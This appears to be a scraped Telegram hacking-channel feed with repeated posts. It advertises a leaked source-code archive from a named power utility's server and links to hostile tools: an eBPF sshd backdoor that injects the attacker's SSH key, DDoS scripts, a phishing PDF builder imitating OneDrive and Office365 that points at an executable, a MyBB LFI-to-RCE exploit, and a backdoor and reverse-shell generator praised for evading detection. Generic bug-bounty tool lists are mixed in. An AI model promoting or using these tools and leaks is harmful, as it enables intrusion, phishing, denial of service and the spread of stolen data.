Forwarded from 卩ro 爪Cracker
tripping.NTDC.COM.PK.zip
230.3 MB
Sourcecode & Sensitive Leaks.
NTDC Tripping Server.
NTDC Tripping Server.
😱2
https://t.me/sidewinders join this channel for more updates .........
gg's hacker's ( have a good day —❤️
‼️Here we go again
Get a (.in) Free Domain for 1 Year!
Offer valid from 26-30th January 2023.
condition is youw ill get 1 Domain for Free.
Website
#hacker_bano_chutiya_nhe 🌜👾🌛
‼️Here we go again
Get a (.in) Free Domain for 1 Year!
Offer valid from 26-30th January 2023.
condition is youw ill get 1 Domain for Free.
Website
#hacker_bano_chutiya_nhe 🌜👾🌛
⚡3👍1
sshd_backdoor
About Using ebpf technique, hijacking the process during sshd service getting the ~/.ssh/authorized_keys to authorize user logging and injecting our public key make our login successful.
Main Process in ebpf program:
Hook OpenAt syscall enter: check if the sshd process call this, log the pid of sshd.
Hook OpenAt Syscall exit: check the pid logged. logging the fd of pid, map pidfd.
Hook Read Syscall enter: check the pid logged. logging the user_space_char_buffer of pid.
Hook Read Syscall exit: check the pid logged. find the buffer and change the buffer into our Key. Then delete pid in map to avoid blocking administrators’ keys be read.
Download Link: https://system32.ink/news-feed/p/184/
About Using ebpf technique, hijacking the process during sshd service getting the ~/.ssh/authorized_keys to authorize user logging and injecting our public key make our login successful.
Main Process in ebpf program:
Hook OpenAt syscall enter: check if the sshd process call this, log the pid of sshd.
Hook OpenAt Syscall exit: check the pid logged. logging the fd of pid, map pidfd.
Hook Read Syscall enter: check the pid logged. logging the user_space_char_buffer of pid.
Hook Read Syscall exit: check the pid logged. find the buffer and change the buffer into our Key. Then delete pid in map to avoid blocking administrators’ keys be read.
Download Link: https://system32.ink/news-feed/p/184/
#DDoS Scripts and Methods
L7/L4/L3 & Game METHODS (USE ONLY FOR EDUCATIONAL PURPOSES!!!)
This repo consists of various DDoS scripts, collected from internet. Layer-4 and Layer-7 levels can be targeted using these scripts.
Note: Scripts written in 'C' need to be compiled with GCC compiler, first.
https://system32.ink/news-feed/p/185/
L7/L4/L3 & Game METHODS (USE ONLY FOR EDUCATIONAL PURPOSES!!!)
This repo consists of various DDoS scripts, collected from internet. Layer-4 and Layer-7 levels can be targeted using these scripts.
Note: Scripts written in 'C' need to be compiled with GCC compiler, first.
https://system32.ink/news-feed/p/185/
Rust PDF builder
It includes these premade templates:
- adobeacrobate
- dropbox
- googledrive
- office365
- onedrive
Custom Templates (Own PDF files) will also work.
Usage: rust-pdf-creator.exe <input_url> <template/file/list>
Example: rust-pdf-creator.exe http://example.com/123.exe onedrive. Download: https://system32.ink/news-feed/p/188/
It includes these premade templates:
- adobeacrobate
- dropbox
- googledrive
- office365
- onedrive
Custom Templates (Own PDF files) will also work.
Usage: rust-pdf-creator.exe <input_url> <template/file/list>
Example: rust-pdf-creator.exe http://example.com/123.exe onedrive. Download: https://system32.ink/news-feed/p/188/
System32
MCracker2002 posted an update
Rust PDF builder
It includes these premade templates:
- adobeacrobate - dropbox - googledrive - office365 - onedrive
Custom Templates (Own PDF files) will also work.
Usage: rust-pdf-creator.exe <input_url> <template/file/list>
Example: rust-pdf-creator.exe…
It includes these premade templates:
- adobeacrobate - dropbox - googledrive - office365 - onedrive
Custom Templates (Own PDF files) will also work.
Usage: rust-pdf-creator.exe <input_url> <template/file/list>
Example: rust-pdf-creator.exe…
Forwarded from CYBER TRICKS ZONE 🇮🇳🚩 (𝙋𝙧𝙤𝙩𝙤𝙘𝙤𝙡 𝙉𝙞𝙘𝙠)
Bugbounty Notes 📒
Inclue OWASP Top 10 And more
#bugbounty #Infsoec
Amazing Git Repo : https://github.com/Voorivex/pentest-guide
Check This Out 👌
Inclue OWASP Top 10 And more
#bugbounty #Infsoec
Amazing Git Repo : https://github.com/Voorivex/pentest-guide
Check This Out 👌
GitHub
GitHub - Voorivex/pentest-guide: Penetration tests guide based on OWASP including test cases, resources and examples.
Penetration tests guide based on OWASP including test cases, resources and examples. - Voorivex/pentest-guide
👍1
GHunt (v2) is Google's offensive framework designed for efficient development. It is currently focused on OSINT, but any Google-related usage is possible..
♾ https://github.com/mxrch/GHunt
♾ https://systemweakness.com/google-mail-hacking-ghunt-v2-gmail-osint-6c76ce78ad35
♾ https://github.com/mxrch/GHunt
♾ https://systemweakness.com/google-mail-hacking-ghunt-v2-gmail-osint-6c76ce78ad35
⚙️ Complete Bug Bounty tool List ⚙️
Enjoy :)
dnscan https://github.com/rbsec/dnscan
Knockpy https://github.com/guelfoweb/knock
Sublist3r https://github.com/aboul3la/Sublist3r
massdns https://github.com/blechschmidt/massdns
Nmap https://nmap.org
Masscan https://github.com/robertdavidgraham/masscan
EyeWitness https://github.com/ChrisTruncer/EyeWitness
DirBuster https://sourceforge.net/projects/dirbuster/
dirsearch https://github.com/maurosoria/dirsearch
Gitrob https://github.com/michenriksen/gitrob
git-secrets https://github.com/awslabs/git-secrets
sandcastle https://github.com/yasinS/sandcastle
bucket_finder https://digi.ninja/projects/bucket_finder.php
GoogD0rker https://github.com/ZephrFish/GoogD0rker/
Wayback Machine https://web.archive.org
waybackurls https://gist.github.com/mhmdiaa/adf6bff70142e5091792841d4b372050
Sn1per https://github.com/1N3/Sn1per/
XRay https://github.com/evilsocket/xray
wfuzz https://github.com/xmendez/wfuzz/
patator https://github.com/lanjelot/patator
datasploit https://github.com/DataSploit/datasploit
hydra https://github.com/vanhauser-thc/thc-hydra
changeme https://github.com/ztgrace/changeme
MobSF https://github.com/MobSF/Mobile-Security-Framework-MobSF/
Apktool https://github.com/iBotPeaches/Apktool
dex2jar https://sourceforge.net/projects/dex2jar/
sqlmap http://sqlmap.org/
oxml_xxe https://github.com/BuffaloWill/oxml_xxe/
XXE Injector https://github.com/enjoiz/XXEinjector
The JSON Web Token Toolkit https://github.com/ticarpi/jwt_tool
ground-control https://github.com/jobertabma/ground-control
ssrfDetector https://github.com/JacobReynolds/ssrfDetector
LFISuit https://github.com/D35m0nd142/LFISuite
GitTools https://github.com/internetwache/GitTools
dvcs-ripper https://github.com/kost/dvcs-ripper
tko-subs https://github.com/anshumanbh/tko-subs
HostileSubBruteforcer https://github.com/nahamsec/HostileSubBruteforcer
Race the Web https://github.com/insp3ctre/race-the-web
ysoserial https://github.com/GoSecure/ysoserial
PHPGGC https://github.com/ambionics/phpggc
CORStest https://github.com/RUB-NDS/CORStest
Retire-js https://github.com/RetireJS/retire.js
getsploit https://github.com/vulnersCom/getsploit
Findsploit https://github.com/1N3/Findsploit
bfac https://github.com/mazen160/bfac
WPScan https://wpscan.org/
CMSMap https://github.com/Dionach/CMSmap
Amass https://github.com/OWASP/Amass
Extra Tools
http://projectdiscovery.io
@freehackingresources
Enjoy :)
dnscan https://github.com/rbsec/dnscan
Knockpy https://github.com/guelfoweb/knock
Sublist3r https://github.com/aboul3la/Sublist3r
massdns https://github.com/blechschmidt/massdns
Nmap https://nmap.org
Masscan https://github.com/robertdavidgraham/masscan
EyeWitness https://github.com/ChrisTruncer/EyeWitness
DirBuster https://sourceforge.net/projects/dirbuster/
dirsearch https://github.com/maurosoria/dirsearch
Gitrob https://github.com/michenriksen/gitrob
git-secrets https://github.com/awslabs/git-secrets
sandcastle https://github.com/yasinS/sandcastle
bucket_finder https://digi.ninja/projects/bucket_finder.php
GoogD0rker https://github.com/ZephrFish/GoogD0rker/
Wayback Machine https://web.archive.org
waybackurls https://gist.github.com/mhmdiaa/adf6bff70142e5091792841d4b372050
Sn1per https://github.com/1N3/Sn1per/
XRay https://github.com/evilsocket/xray
wfuzz https://github.com/xmendez/wfuzz/
patator https://github.com/lanjelot/patator
datasploit https://github.com/DataSploit/datasploit
hydra https://github.com/vanhauser-thc/thc-hydra
changeme https://github.com/ztgrace/changeme
MobSF https://github.com/MobSF/Mobile-Security-Framework-MobSF/
Apktool https://github.com/iBotPeaches/Apktool
dex2jar https://sourceforge.net/projects/dex2jar/
sqlmap http://sqlmap.org/
oxml_xxe https://github.com/BuffaloWill/oxml_xxe/
XXE Injector https://github.com/enjoiz/XXEinjector
The JSON Web Token Toolkit https://github.com/ticarpi/jwt_tool
ground-control https://github.com/jobertabma/ground-control
ssrfDetector https://github.com/JacobReynolds/ssrfDetector
LFISuit https://github.com/D35m0nd142/LFISuite
GitTools https://github.com/internetwache/GitTools
dvcs-ripper https://github.com/kost/dvcs-ripper
tko-subs https://github.com/anshumanbh/tko-subs
HostileSubBruteforcer https://github.com/nahamsec/HostileSubBruteforcer
Race the Web https://github.com/insp3ctre/race-the-web
ysoserial https://github.com/GoSecure/ysoserial
PHPGGC https://github.com/ambionics/phpggc
CORStest https://github.com/RUB-NDS/CORStest
Retire-js https://github.com/RetireJS/retire.js
getsploit https://github.com/vulnersCom/getsploit
Findsploit https://github.com/1N3/Findsploit
bfac https://github.com/mazen160/bfac
WPScan https://wpscan.org/
CMSMap https://github.com/Dionach/CMSmap
Amass https://github.com/OWASP/Amass
Extra Tools
http://projectdiscovery.io
@freehackingresources
GitHub
GitHub - rbsec/dnscan
Contribute to rbsec/dnscan development by creating an account on GitHub.
👌2
MYBB_1.8.32_LFI_RCE
MyBB 1.8.32 – Chained LFI Remote Code Execution (RCE) (Authenticated) python exploit script…
Download: https://system32.ink/news-feed/p/194/
MyBB 1.8.32 – Chained LFI Remote Code Execution (RCE) (Authenticated) python exploit script…
Download: https://system32.ink/news-feed/p/194/
hackebds(2023.1.29 0.3.3)
Generate backdoor programs of various architectures. The backdoor program is packaged in shellless pure shellcode and is smal,Pure static backdoor .Armv5, Armv7, Armv8, mipsel, mips,mips64,mipsel64,powerpc, powerpc64,sparc,sparc64 are now supported, and they are still being updated (PS:bash support is added to the reverse shell after version 0.3.1). If the backdoor of the reverse shell is generated with the - power parameter, the reverse shell will continue to be generated on the target machine)
Generate reverse_shell shellcode of various architectures during the exploit process, and no null bytes, which facilitates the exploitation of memory corruption vulnerabilities on embedded devices. Armv5, Armv7, Armv8, mipsel, mips, mips64, mipsel64, powerpc, powerpc64,sparc are now supported, and they are still being updated|
Generate bind of various architectures bind_Shell file.
Support command line generation backdoor and shell code, Strong anti hunting ability,characterized by light, small, efficient and fast
Download: https://system32.ink/news-feed/p/204/
Generate backdoor programs of various architectures. The backdoor program is packaged in shellless pure shellcode and is smal,Pure static backdoor .Armv5, Armv7, Armv8, mipsel, mips,mips64,mipsel64,powerpc, powerpc64,sparc,sparc64 are now supported, and they are still being updated (PS:bash support is added to the reverse shell after version 0.3.1). If the backdoor of the reverse shell is generated with the - power parameter, the reverse shell will continue to be generated on the target machine)
Generate reverse_shell shellcode of various architectures during the exploit process, and no null bytes, which facilitates the exploitation of memory corruption vulnerabilities on embedded devices. Armv5, Armv7, Armv8, mipsel, mips, mips64, mipsel64, powerpc, powerpc64,sparc are now supported, and they are still being updated|
Generate bind of various architectures bind_Shell file.
Support command line generation backdoor and shell code, Strong anti hunting ability,characterized by light, small, efficient and fast
Download: https://system32.ink/news-feed/p/204/